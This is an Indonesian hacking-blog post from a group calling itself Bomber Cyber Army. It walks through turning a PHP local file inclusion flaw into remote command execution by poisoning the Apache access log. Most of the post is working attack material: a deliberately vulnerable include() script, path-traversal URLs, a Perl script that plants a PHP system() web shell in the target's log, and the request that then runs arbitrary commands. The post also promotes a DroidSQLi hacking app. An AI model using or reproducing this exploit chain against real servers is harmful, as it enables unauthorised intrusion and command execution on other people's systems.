input license here

Report Abuse

Search This Blog

Featured Post

Download Aplikasi DroidSQLI Mods v1.0

Assalamualaikum,halo pengunjung selamat datang di blog Bomber Cyber Army, pada artikel kali ini saya akan memberikan Download Aplikasi DroidSQLi Mods v1.0. Droid SQLI DroidSQLi adalah aplikasi yang sangat mengagumkan dan sempurna untuk meretas dan m…

SQL LFI


 Fungsi-fungsi yang dapat menimbulkan terjadinya LFI :

include();

include_once();

require();

require_once();

Dengan syarat pada Konfigurasi server :

allow_url_include =on

allow_url_fopen = on

magic_quote_gpc = off


Ok…disini saya buat 2 file php sebagai contoh :

————–index.php———————————————–

<?php

echo “Selamat datang website studi kasus Seminar Web Trilogi”;

if ($_GET[halaman]==’lfi’){

include “$_GET[file]”;

}else{

echo “index.php?halaman=lfi&file=isi.php”;

}

?>

———————————————————————-

————–isi.php————————————————-

<?php

echo “<p>Ini adalah contoh bagaimana menggunakan cara LFI untuk mendapatkan shell di komputer target</p>”;

?>


Setelah itu kita cek apakah bisa disisipi kode sebagai berikut :

http://localhost/seminarmosc/index.php?halaman=lfi&file=http://www.google.com

Jika terbuka halaman google, berarti bisa kita inject. Dalam materi kali ini kita akan mengeksploitasi access.log milik target, untuk mendapatkan akses menulis ke dalamnya sehingga kita bisa memanfaatkan teknik RCE (Remote Command Execution).

Ok…kita mulai dengan mengakses link berikut :

http://localhost/seminarmosc/index.php?halaman=lfi&file=../../logs/access.log

jika file access.log terbaca berarti kita siap ketahap berikutnya. Tahap berikutnya adalah membuat sebuah file perl untuk memasukkan kode ke file access.log, sebagai berikut :

————–comeback.pl———————————————

######################################################################

use IO::Socket::INET;

my $host = $ARGV[0];

print “\n [*] Injecting Apache Access Log …\n”;

$sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort =>80, Proto => “tcp”) || die ” [!] Can’t connect to $host:80!\n”;

my $ comeback = “<?php if (get_magic_quotes_gpc()) {\$_GET[comeback]=stripslashes(\$_GET[comeback]);} system(\$_GET[comeback]);?>”;

print $sock “GET / comeback.m0de.0n “.$ comeback.” HTTP/1.1\r\n”;

print $sock “Host: “.host.”\r\n”;

print $sock “Connection : close\r\n”;

close($sock);

print ” [*] Done …\n”;

######################################################################

———————————————————————-

Untuk menjalankannya di komputer kita harus terinstall active perl sebelumnya.


C:\Perl\bin>comeback.pl http://www.namadomain.com

[*] Injecting Apache Access Log …

[*] Done …

Kemudian kita cek apakah kode ini berhasil di injek atau tidak dengan mengakses file access.log, jika berhasil maka access.log akan berisi kalimat :

“GET / comeback.m0de.0n

Warning: system() [function.system]: Cannot execute a blank command in C:/wamp/logs/access.log on line 14

Kemudian tinggal kita injek menggunakan perintah berikut :

localhost/seminarmosc/index.php?halaman=lfi&file=../../logs/access.log %00&comeback=[CMD]

dengan [CMD] diganti perintah-perintah CLI seperti DIR, IPCONFIG, CD, MKDIR, REMOVE

BomberCyberArmy
Gw F4K3_5M1LE

Related Posts

Post a Comment